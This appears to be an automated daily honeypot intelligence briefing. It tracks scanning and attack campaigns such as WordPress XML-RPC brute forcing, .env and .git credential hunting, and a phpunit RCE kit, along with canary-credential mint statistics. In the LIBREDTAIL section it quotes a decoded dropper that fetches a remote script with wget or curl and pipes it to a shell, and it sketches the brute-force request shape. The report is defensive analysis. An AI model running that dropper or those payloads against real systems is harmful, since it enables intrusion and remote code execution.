FLUX FLEET — INTEL BRIEFING №16

Period: 2026-09-10 07:32 – 2026-09-11 07:32 UTC (24h digest window, day 15 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 15-day baseline, every result-tag spike attributed by spot query)

The digest window starts at the previous digest run time. Events from 03:32 to 07:32 UTC on 09-10 appear in both this digest and №15's data. The true new window starts at 07:32 UTC on 09-10. All times are UTC and quoted from the raw log timestamps. №15's tail (182.8.249.108's two mints at 04:38–04:39, 204.76.203.18's loop tail through 07:31, and the 94.154.43.x pool probes) is overlap and is not recounted as new. control-1's log sync failed for the second consecutive cycle (ssh root@100.127.175.34 times out; re-verified 09-11 after the digest), so control-1 contributed zero true-window data — its digest rows are last-synced tail and its campaign figures this cycle are floors, not observations.

BLUF

XMLRPC-BRUTE returned at record volume: 207.175.64.93 (Google LLC, BE) fired 8,131 system.multicall POSTs at /xmlrpc.php on farm in 4 minutes 12 seconds, one fixed username (spd) against ~7,842 rotating passwords, with the same preflight trio №14's operator used. The OMEGA-SWEEP census came home to its /46 block: 94.154.46.245 ran the 743-path/93-family single-minute census on aidev and minted 10, and two IPs from the sibling 94.154.43.x pool minted for the first time. METADATA-HUNT went silent — zero runners and zero template markers in the window, the first empty window since tracking began. MEVSPACE-GITWALK revived after six idle windows with two operators, including a Hetzner IPv6 walker that hit both EU nodes. The Tracebit funnel stayed closed: 26 mints to 14 collectors, zero AWS use, the second consecutive zero-use window.

Key Judgements

  1. XMLRPC-BRUTE is now a multi-operator commodity with a record burst. 207.175.64.93 (Google LLC, BE) POSTed 8,131 multicall bodies to /xmlrpc.php from 15:26:41 to 15:30:53 UTC on farm, 8,139 events across only 5 paths, one UA (forged Chrome/89), and 7,843 distinct body hashes. Every body wraps wp.getUsersBlogs with the fixed username spd and a rotating password (captured samples: travel123me, fo az902, 1dc5df, m@eJ#Dx7jy2hpXH, xkdr7k). The preflight (/wp-includes/wlwmanifest.xml, /wp-json/wp/v2/users/, /wp-json/oembed/1.0/embed) matches №14's 35.233.85.98 shape. A Google ASN source hosting a 7843-body single-account dictionary is new to the record. (High confidence — per-IP counts and bodies from v_full; the whole farm wp-xmlrpc-post spike is this one IP, 0 mints)
  2. The OMEGA-SWEEP operator pool now mints from two hosting blocks and its original pool. 94.154.46.245 (Omegatech, US) ran the census on aidev at 16:25:28–16:25:41 UTC: 1,500 events, 743 paths, 93 trap families, forged Googlebot/2.1, 10 mints at /.env — the №12 template path for path. Then 94.154.43.146 (aidev, 18:51:05) and 94.154.43.180 (farm, 18:51:44) each minted 1 in single-/.env-request runs under a forged Chrome/147 UA — the first observed mints from the 94.154.43.x pool, which previously only probed. (High confidence — per-IP result inventories compared by spot query; the 93-family count and UA match the №12–№15 record)
  3. METADATA-HUNT paused. The window contains zero __aws_leak_probe or @fs events and no runner — the first zero-runner window in the record (№13: three runners, №14: one, №15: one). The mint collapse (67 → 26) follows directly: the 25-mint runner batches are absent. (High confidence — exact-zero counts on both template marker paths across all sensors)
  4. MEVSPACE-GITWALK revived with two operators. The original 109.205.211.201 (MEVSPACE sp. z o.o., AZ) returned on farm at 20:50:15 UTC with a 142-path .git walk (144 events, fake-git + gitignore results). A second operator, 2a01:4f8:161:34c1::2 (Hetzner Online GmbH, DE), ran the same environment-named-ref walk on both EU nodes 10 minutes apart (aidev 02:19, farm 03:21 UTC on 09-11): 288 events, 142 paths each node, stale Firefox/78 UA, 286 fake-git results, 0 mints. This is the template's first standalone run since day 8. (Moderate confidence — same path families and UA class as the №9 template; the Hetzner IPv6 differs from №10's 2a01:4f8:141:225b::2, so two Hetzner IPv6 operators now exist)

Active Campaigns (day 15 status)

Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.

⟳ XMLRPC-BRUTE (xmlrpc multicall brute) — hostile, returned at record volume, new operator class

  • Actors: 207.175.64.93 (Google LLC, BE), farm only, one burst 15:26:41–15:30:53 UTC: 8,139 events, 8,131 POSTs, all wp-xmlrpc-post 200s. No other IP touched /xmlrpc.php in the window. №14's operator 35.233.85.98 stayed silent.
  • TTPs: Preflight trio then flood: /wp-includes/wlwmanifest.xml, /wp-json/wp/v2/users/, /wp-json/oembed/1.0/embed, then 8,131 POSTs of <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>... wrapping wp.getUsersBlogs with fixed username spd and ~7,842 rotating passwords. Bodies averaged ~490 bytes, 7,843 distinct hashes — a single-account dictionary at 32 POSTs/second. Same anatomy as №14's 35.233.85.98 run (preflight + fixed user + rotating passwords), different hosting (Google BE vs GCP BE), larger by 5×.
  • Assessment: Third operator in the campaign's history (Google Cloud day 2, 1337 Services №2–7, 35.233.85.98 №14, now 207.175.64.93). The fake-WordPress farm absorbed all 8,131 POSTs at 200 with 0 mints. The burst drove farm's +86% volume delta alone: without it, farm ran ~1,600 events against a 5,222 7-day average. Volume, not novelty, is the story — watch for the spd username on other IPs.

⟳ OMEGA-SWEEP (Omegatech census template, forged Googlebot/2.1) — hostile, returned to the /46 block, pool minted

  • Actors: 94.154.46.245 (Omegatech LTD, US) on aidev, first appearance as an operator: 16:25:28–16:25:41 UTC, 1,500 events, 10 mints. The pool IPs 94.154.43.146 (aidev) and 94.154.43.180 (farm) minted 1 each at 18:51 UTC. The other /46 operators (.242, .243, .247, .248) did not run.
  • TTPs: Single-minute census, forged Googlebot/2.1, /.env mint paths inside the run. The .245 inventory covers 93 trap families and drove every aidev spike this cycle: ssh-private-key-error 54, app-config-python 40, app-config-php 30, rails-database-yml 22 — each spike is 100% this IP.
  • Assessment: The census returned to its home block after №15's two-window escape to Omegatech-US-control and Dedik-CH. Four hosting blocks have now run the wordlist (94.154.46.x ×4, 176.65.144.71, plus the .43 pool's first mint), and the pool itself shifted from probe-only to minting. The /46 hoard roster stands at .243 (31), .244 (12), .247 (12), .248 (10), .242 (6), .245 (10) — all zero observed use.

⟳ MEVSPACE-GITWALK (git-internals walk) — hostile, revived after six idle windows, two operators

  • Actors: 109.205.211.201 (MEVSPACE sp. z o.o., AZ) — the original №9 operator — on farm, 20:50:15–20:50:17 UTC, 144 events, 142 paths. New operator 2a01:4f8:161:34c1::2 (Hetzner Online GmbH, DE) on both EU nodes: aidev 02:19–02:21 UTC, farm 03:21–03:23 UTC on 09-11, 288 events, 142 paths per node, 1 UA.
  • TTPs: Environment-named refs walk unchanged: /.git/refs/remotes/origin/{staging,release,prod,production}, /.git/refs/tags/{v1.1,v2.0.0,latest}, /.git/logs/refs/heads/develop, /.git/objects/info/packs, /.git/hooks/{update,post-update}.sample, /.git/refs/wip/{wtree,index}/refs/heads/{dev,main}. 286 fake-git results. Stale Firefox/78 UA on the IPv6 walker.
  • Assessment: The registry marked the template commoditized via CRUSADER-SWEEP class B; this is its first direct two-operator return. Both runs drew fake-git responses and minted nothing. Two operators in one window after six idle ones reads as re-activation, not residue — watch for a second Hetzner IPv6 and for object-hash fetches (GIT-VAULT's №13 upgrade).

⟳ LIBREDTAIL-KIT (phpunit RCE + key exfil + shell dropper) — hostile, third window, dropper arg reverted

  • Actors: 8 full-kit IPs, one ~49-event/44-path run each, on both EU nodes, 0 mints: 187.87.144.234 (farm, 10:11), 62.238.58.32 (aidev, 13:44), 160.250.132.238 (aidev, 19:22), 60.49.60.81 (aidev, 21:55), 149.50.101.31 (farm, 02:48 on 09-11), 169.58.204.118 (farm, 00:38 on 09-11), 85.239.149.72 (aidev, 05:29 on 09-11), 13.83.90.155 (aidev, 17:58). Plus a 4-event partial from 103.100.211.183 (aidev, 14:10). ASNs span 5 countries; no concentration.
  • TTPs: Chain unchanged: md5("Hello PHPUnit")-class probes across eval-stdin.php permutations (the 222-event phpunit-eval-stdin spike is 8×37 exactly these runs), 2× POST /index.php with shell_exec(base64_decode(...)), then POST /bin/sh. The dropper body, verbatim after decode: (wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s apache. The №15 cve_2024_4577.selfrep argument is gone — 0 hits in the window.
  • Assessment: Third consecutive window, staging host 217.60.195.113 unchanged across all three. The argument flip-flop (apacheselfrepapache) reads as per-run operator choice, not a payload change. The selfrep claim stays unverified; the fleet again saw no self-propagation.

⟳ REGISTRY-HUNT (LeakIX weblogic→docker-registry walk) — borderline scanner, contracted to 7 IPs, GraphQL probes grew

  • Actors: 7 l9scan IPs this window (№15: 24), all DigitalOcean, on farm and aidev: 142.93.129.190 (82 events, both nodes), 143.110.213.72, 139.59.132.8, 139.59.136.184, 159.89.127.165, 167.99.210.137, 46.101.1.225 (41 each). 328 events total, 7 mints (1 per IP), the two UA variants still split by sensor.
  • TTPs: The 15-step template unchanged. GraphQL probes grew: 24 /graphql events (12 per node), 16 graphql-introspection, 8 graphql-credential-canary hits — all 7 runners probed it, vs 6 single probes in №15.
  • Assessment: Wave size collapsed but per-IP depth held and the GraphQL family is now standard in the walk. LeakIX stays a report-as-scanner entry: 1 mint per IP, shallow, honest attribution, no hostile journeys.

⟳ CREDSWEEP (.env-variant census) — hostile, Feo Prest second operator returned

  • Actors: 213.209.159.175 (Feo Prest SRL, DE) on farm, 22:43:17–22:43:18 UTC: 51 events, 49 paths, 1 mint at /.env, Android Facebook in-app Chrome/33 UA, blocklisted ipsum:3+firehol2. №15's farm operator .154 did not run; 45.148.10.238 stayed absent (third window).
  • TTPs: The standard .env-variant census: /.env [issued], /backend/.env, /api/.env, /sendgrid.env, /admin/.env, /phpinfo.php, /app_dev.php/_profiler/open, /appsettings.json. Identical result sequence to 80.94.95.211's runs — a shared wordlist across the two operators.
  • Assessment: The Feo Prest /24 now shows census runs from two IPs across three windows (.175 control №14, farm №16; .154 farm №14–№15). Both operators mint sometimes, never use. Template-recruitment pattern holds.

⟳ WP-ENUM (WordPress plugin readme census) — hostile, returned from a sibling block

  • Actors: ⚠ Nine IPs in 45.156.128.x on both EU nodes, 170 events, one shared bare UA (Mozilla/5.0 AppleWebKit/537.36 ... Chrome/123.0.6312.86 Safari/537.36, no platform token): farm 11:17–11:18 (45.156.128.47 with 34 paths, 45.156.128.126 with 29), aidev 22:18–22:22 (45.156.128.10/.13/.14/.15 with 13–19 paths each), plus 3 IPs with 9 /-only tarpit events each. 122 distinct plugin readme.txt paths, all not-handled.
  • TTPs: WordPress plugin readme.txt census + wp-rest-index probes — the №8 WP-ENUM shape. The source block sits one octet from №8's operator 45.156.129.136.
  • Assessment: First return in nine windows, from a sibling /24 with an 8-IP fanout — a scale-up of the original single-burst census. 0 mints. Treat as WP-ENUM's second generation; a third run from this block will make the operator pool real.

⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, shrank below alarm

  • Actors: 52 credential POSTs in the true window (farm 38, aidev 14) from distinct IPs, forged browser UAs, whole-window spread. №15's 149-pair peak and the WP-REST-ENUM sibling (1 event) both fell away.
  • Assessment: 100 → 149 → 52. The 200-pair growth alarm stays armed; background noise.

Standing actors (persistence check)

  • 80.94.95.211 (SS-Net, RO) — ninth window in ten: aidev, 102 events, 49 paths, 2 mints (11:06 UTC on 09-10 under the Firefox/2.0.0.1 forgery, 06:54 UTC on 09-11 under Chrome/14). 10 all-time mints, zero observed use. The result sequence matches 213.209.159.175's exactly — same wordlist, second standing operator confirmed again.
  • 16.5.0.236 (Hello World UA) — returned on all 3 nodes, 32 events. Benign-shape.
  • 89.248.172.33 / 93.174.93.12 / 89.248.171.24 / 89.248.172.11 — uptime-prober set, present and /-only: .33 108 events, 93.174.93.12 95, .24 14, .11 4. Benign-shape.
  • 3.129.187.38 (visionheight.com/scan) — fourth consecutive window: 38 events across farm and aidev, / + /robots.txt only.
  • New single-/.env collectors: 147.90.209.220 (farm, 1 mint at 22:19, empty UA, 2 events all-time — the №15 one-mint collector family returned), 182.8.249.108 minted only in №15's tail (04:38–04:39, overlap, not recounted).
  • Absent this window: 45.148.10.238 (third), 91.245.74.31 (third), 43.228.157.68 (no second run — stays standing), 193.32.204.199, 64.49.8.54, 132.196.6.75, 198.23.174.202, 159.26.110.179 (third), 213.209.159.154, 94.154.46.242/.248, 176.65.144.71, 35.233.85.98 (XMLRPC-BRUTE operator), 160.178.89.73 (NIGHTAGENT idle again — second idle in three windows), 18.116.101.220, 84.21.173.161, 102.220.161.87/.102, and 91.92.241.215.

Canary credentials

Summary

No canary credentials were used in AWS during the window. Fleet sensors minted 26 credentials to 14 collector IPs; none reached AWS.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 26
Distinct collector IPs 14
Credentials used in AWS (alerts) 0
Credentials stolen, no observed AWS use in window 26

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
94.154.46.245 ai-devbox-1 10 0 0 10 mints since 2026-09-10 16:25
80.94.95.211 ai-devbox-1 2 0 0 8 mints since 2026-09-04 11:07
139.59.132.8 canary-farm-1 1 0 0 1 mints since 2026-09-10 20:35
139.59.136.184 ai-devbox-1 1 0 0 4 mints since 2026-09-05 20:41
140.245.97.208 ai-devbox-1 1 0 0 2 mints since 2026-09-11 02:49
140.245.97.208 canary-farm-1 1 0 0 2 mints since 2026-09-11 02:49
142.93.129.190 ai-devbox-1 1 0 0 4 mints since 2026-09-07 20:16
142.93.129.190 canary-farm-1 1 0 0 4 mints since 2026-09-07 20:16
143.110.213.72 canary-farm-1 1 0 0 1 mints since 2026-09-10 20:31
147.90.209.220 canary-farm-1 1 0 0 2 mints since 2026-09-09 02:44
159.89.127.165 canary-farm-1 1 0 0 1 mints since 2026-09-10 20:35
167.99.210.137 ai-devbox-1 1 0 0 2 mints since 2026-09-05 20:38
213.209.159.175 canary-farm-1 1 0 0 1 mints since 2026-09-10 22:43
46.101.1.225 ai-devbox-1 1 0 0 2 mints since 2026-09-07 20:22
94.154.43.146 ai-devbox-1 1 0 0 2 mints since 2026-09-04 14:45
94.154.43.180 canary-farm-1 1 0 0 1 mints since 2026-09-10 18:51

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • 104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:25
  • 136.67.37.69: 25 mints, 2026-09-08 19:55 → 2026-09-08 19:55
  • 34.22.137.199: 25 mints, 2026-09-07 17:26 → 2026-09-07 17:26
  • 34.6.12.67: 25 mints, 2026-09-09 09:09 → 2026-09-09 09:09
  • 34.83.24.21: 25 mints, 2026-09-07 05:10 → 2026-09-07 05:10
  • 35.252.125.133: 25 mints, 2026-09-08 18:51 → 2026-09-08 18:52
  • 94.154.46.243: 20 mints, 2026-09-04 03:42 → 2026-09-04 03:42
  • 136.85.124.29: 17 mints, 2026-09-07 15:44 → 2026-09-07 15:44
  • 196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:26
  • 94.154.46.247: 12 mints, 2026-09-06 19:02 → 2026-09-06 19:02
  • 34.23.228.150: 11 mints, 2026-09-04 21:35 → 2026-09-04 21:35
  • 87.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-04 05:06
  • 45.148.10.238: 10 mints, 2026-09-05 20:43 → 2026-09-07 12:19
  • 94.154.46.245: 10 mints, 2026-09-10 16:25 → 2026-09-10 16:25
  • 94.154.46.248: 10 mints, 2026-09-08 07:51 → 2026-09-08 07:51
  • 136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:28
  • 167.99.79.44: 8 mints, 2026-09-08 19:11 → 2026-09-08 20:24
  • 80.94.95.211: 8 mints, 2026-09-04 11:07 → 2026-09-11 06:54
  • 91.245.74.31: 7 mints, 2026-09-04 10:52 → 2026-09-06 21:30
  • 41.142.109.20: 6 mints, 2026-09-05 05:09 → 2026-09-05 05:47
  • 72.167.41.202: 6 mints, 2026-09-04 18:22 → 2026-09-04 18:22
  • 94.154.46.242: 6 mints, 2026-09-09 16:38 → 2026-09-09 16:39
  • 102.220.161.87: 4 mints, 2026-09-07 23:07 → 2026-09-09 13:44
  • 136.70.70.191: 4 mints, 2026-09-09 03:53 → 2026-09-09 03:53
  • 139.59.136.184: 4 mints, 2026-09-05 20:41 → 2026-09-10 20:35
  • 142.93.129.190: 4 mints, 2026-09-07 20:16 → 2026-09-10 20:23
  • 176.65.144.71: 4 mints, 2026-09-09 21:56 → 2026-09-09 21:56
  • 182.8.227.195: 4 mints, 2026-09-04 21:16 → 2026-09-06 23:30
  • 185.141.119.179: 4 mints, 2026-09-05 10:17 → 2026-09-05 10:26
  • 194.180.49.37: 4 mints, 2026-09-04 16:02 → 2026-09-04 17:18
  • 31.57.219.158: 4 mints, 2026-09-06 13:11 → 2026-09-06 13:23
  • 206.189.95.232: 3 mints, 2026-09-04 20:32 → 2026-09-09 21:44
  • 209.97.180.8: 3 mints, 2026-09-05 20:42 → 2026-09-09 14:35
  • 41.140.11.235: 3 mints, 2026-09-08 06:34 → 2026-09-08 06:45
  • 84.21.173.161: 3 mints, 2026-09-06 22:19 → 2026-09-07 13:00

Canary-use attribution (briefing prose)

The funnel stayed closed: 26 mints to 14 collectors, zero AWS calls for the second consecutive window. Mint volume collapsed with the METADATA-HUNT pause — the two 25-mint runner batches that dominated №14–№15 were absent, and the largest window batch fell to 10 (the OMEGA census). The 159.26.110.179 credentials remain out of the 6-day history with no recorded consumption; its №14 GetCallerIdentity success is still the funnel's only non-Converse use and its only success. First-time mints: 94.154.43.146 and 94.154.43.180 — the pool block moved from probe-only to minting. Treat the zero as "no observed use": №14's uses trailed the mint by hours, and the persistent hoards (94.154.46.x at 31+12+10+10+6, 80.94.95.211 at 8) are unchanged.

Fleet Observations

  • Canary economics: True-window mints 26 to 14 collectors (farm 9, aidev 17 per the spot query's issued rows; digest-window table reads farm 9 / aidev 19 / control 0), all ["aws"]. Mint failures: 0 — the first zero-failure window since tracking began. All-time: 876 credentials to 252 collector IPs (850 + 26 minted this window).
  • XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows (855 requests carried single-entry XFF) — fourteenth consecutive clean day post-fix.
  • TLS/attribution posture: Farm served 403 https events in the true window (8,748 Host-header events on sso.rightabouteverything.show in the digest window, 928 on the bare IP), aidev 318 https on inference.fapthropic.com (2,488 on the bare IP). Control stayed deliberately certless: 0 https.
  • Volume: Digest window 13,123 events (farm 9,728 +86% / aidev 2,914 −86% / control 481 −87%). Farm's +86% is one actor: 207.175.64.93's 8,139-event burst (the 11:00 UTC hour alone ran 8,225). Aidev's −86% against a 21,045 7-day average is baseline distortion — the 7-day mean carries CRUSADER-SWEEP class B's 50,112-event day and the big censuses; this window's aidev driver was the 1,500-event OMEGA census (the 16:00 hour, 1,523 events). Control's −87% is not a signal: the node is blind (see the digest-quirks note and Gaps 1) and its digest rows are last-synced tail.
  • Control discovery velocity: Unmeasurable this cycle — the 2026-09-11 digest row (481 events, 35 IPs) is stale-tail overlap from 204.76.203.18's loop, not new discovery. The day-15 cell is a hole in the ramp dataset: 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120 → 110 → 78 → blind.
  • Result-tag spikes: Every spike attributed by spot query. aidev phpunit-eval-stdin 222 (4.5×) = 8 LIBREDTAIL runs × 37; aidev cmd-injection-php-cgi-rce 32 (6.1×) = the same 8 runs' /bin/sh + RCE stages (42 events, 9 IPs in the window); aidev ssh-private-key-error 54, app-config-python 40, app-config-php 30, rails-database-yml 22 = 94.154.46.245's census alone; farm wp-xmlrpc-post 8,131 (6.3×) = 207.175.64.93 alone; farm method-not-allowed 30 = the two Nmap NSE scanners (24) + LeakIX (6). All spikes attributed.
  • Digest quirks (all re-checked this run): control-byte-stripped copy needed for UTF-8 reads; +4 h timestamp cast; single-writer DuckDB lock (all spot queries ran sequentially); sync-arrival first-seen stamps; window overlap with №15 cross-checked before counting anything new. Carried from №15: the control-1 sync failure repeated (ssh root@100.127.175.34 times out; verified 2026-09-11 after the digest) — two consecutive failures, a 24-hour blind spot per failure on the differential node.
  • Infrastructure: no fleet-side changes this cycle. control-1's second consecutive sync failure is the one operational exception, noted above and in Gaps.

Gaps / Next Collection

  1. control-1 recovery. Two consecutive sync failures. Before the next run, check reachability (ssh root@100.127.175.34 true; the only permitted node action is systemctl start flux-log-sync.service once SSH answers). A third failure turns the control-velocity dataset into a 3-day hole and leaves MALWARE-DICT's loop, the fresh-IP ramp, and any control-only campaign unobserved.
  2. The funnel's third zero. Two consecutive zero-use windows against 93 minted credentials. Check the Tracebit pull window against the full mint history of the 35 persistent collectors (uses can trail the flux cutoff — the №14 precedent), and re-check the 159.26.110.179 credentials outside the flux window. A third zero against a growing hoard makes the resale hypothesis the lead explanation.
  3. METADATA-HUNT's pause. Zero runners after 5 runner days. A return next cycle with the absorbed ORACLE-SWEEP families intact means a pause; a return with a changed wordlist means an upgrade. Check for the 25-mint batch shape first.
  4. XMLRPC-BRUTE operator spread. The spd-username multicall shape at 32 POSTs/s is new. Check №14's 35.233.85.98 (ac14tbobpb) for a return and watch for either username on other IPs — a third operator inside four windows makes the commodity label definitive.
  5. WP-ENUM scale-up. The 45.156.128.x cluster ran 122 readme paths across 8 working IPs. A second run, or a mint, promotes the cluster; check whether the 45.156.129.136 original rejoins.
  6. MEVSPACE-GITWALK persistence. Two operators in one revival window. Watch for a Hetzner IPv6 /29 pattern and for object-hash fetches (/.git/objects/<2>/<38>), which would merge this with GIT-VAULT's №13 upgrade.

Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-11.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (207.175.64.93), plus 30 ad-hoc v_full queries (XMLRPC burst profile and body extraction, OMEGA census and pool-mint attribution, LIBREDTAIL roster and dropper decode, MEVSPACE revival profile, WP-ENUM cluster profile, spike attribution per tag, standing-actor persistence, mint roster) and the Tracebit canary-section generator.